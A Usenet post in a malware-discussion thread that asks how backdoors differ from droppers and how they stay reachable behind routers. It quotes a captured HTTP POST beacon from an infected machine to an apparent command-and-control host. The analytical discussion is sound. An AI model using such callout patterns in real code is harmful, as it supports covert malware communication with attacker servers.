"David H. Lipman" wrote:
 
> As a Backdoor, it has to Beacon the compromised system and/or
> Phone Home.

Wouldn't the act of downloading a payload package be a beacon or signal
in and of itself?

What is being "beacon'd" or signaled by the following that couldn't be
done by Getting what presumably it will end up getting anyways in the
near future?
 
> POST /allow.php HTTP/1.1
> Cache-Control: no-cache
> Connection: close
> Pragma: no-cache
> Content-Type: application/octet-stream
> User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;
> Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
> 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
> Content-Length: 42
> Host: betaleuco.net

?

Is there a difference between a backdoor and a dropper?

Am I thinking that these initial infectors are usually droppers - in
that the first (and perhaps only) thing they do is obtain and launch at
least one additional code file from an external server? 

Whereas a backdoor has enough functionality to be persistent on the
infected system and accept incoming connections to carry out future
instructions?

If the latter, how does the backdoor insure that it is reachable through
the gateway or nat-router to which the host is presumably connected to
the internet?  (presumably it can easily defeat any firewall running on
the host)
--- NewsGate v1.0 gamma 2